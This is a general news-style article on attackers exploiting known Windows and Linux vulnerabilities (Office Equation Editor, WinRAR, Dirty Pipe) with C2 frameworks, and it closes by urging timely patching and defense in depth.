Hackers Exploiting Windows and Linux System Flaws for Unauthorized Access in Actual Assaults
In the ever-evolving landscape of cybersecurity, the exploitation of known vulnerabilities continues to pose a significant threat to both individuals and organizations. Recent research has shown that even years-old flaws, such as CVE-2018-0802 and CVE-2017-11882 in the Equation Editor component of Microsoft Office, remain heavily exploited despite patches being available.
These attacks often begin with phishing emails or malicious web content designed to deliver weaponized documents. Once opened, the embedded exploits target unpatched vulnerabilities in commonly used software components, allowing attackers to execute arbitrary code on victim machines. This dual-exploit chain enables adversaries to bypass user-level defenses and deploy rootkits undetected.
Beyond Microsoft Office, attackers have also leveraged weaknesses in WinRAR's archive-handling, with CVE-2023-38831 and the directory traversal flaw CVE-2025-6218 allowing malicious files to be placed outside the intended extraction path. The Russian-affiliated hacker group RomCom has been actively exploiting a previously unknown vulnerability in WinRAR, as observed by ESET researchers in August 2025.
On the Linux side, the Dirty Pipe vulnerability (CVE-2022-0847) remains a critical favorite for privilege escalation. CVE-2019-13272 and CVE-2021-22555 continue to be used to gain root access on unpatched Linux servers.
The implants used in these attacks include in-memory protection to evade antivirus scans and use legitimate Windows services to blend into normal processes. The two-stage payload downloaded by the vulnerability trigger consists of a small loader and a full-featured malware binary. Once installed, attackers often maintain persistence by installing custom Command and Control (C2) frameworks such as Sliver or Havoc.
In many incidents, once kernel-level control is achieved, attackers load a malicious driver into kernel space, providing them with unrestricted code execution. This is exemplified by the exploitation of CVE-2024-35250.
The persistence of older vulnerabilities alongside newer flaws emphasizes the importance of timely patching and comprehensive defense-in-depth strategies. Organizations should prioritize updates for both user applications and system components to minimize the risk of these prevalent exploits in real-world attacks.
As a response to these threats, Microsoft has been actively patching critical vulnerabilities impacting Microsoft Outlook and other services, with managed IT service clients receiving automatic updates and other users urged to update manually. The Zug government launched a cybersecurity initiative to better protect against cyberattacks, including those exploiting such vulnerabilities.
In conclusion, the exploitation of known vulnerabilities continues to be a significant threat in the current cybersecurity landscape. By prioritizing timely patching and adopting comprehensive defense-in-depth strategies, organizations can significantly reduce their risk of falling victim to these attacks.
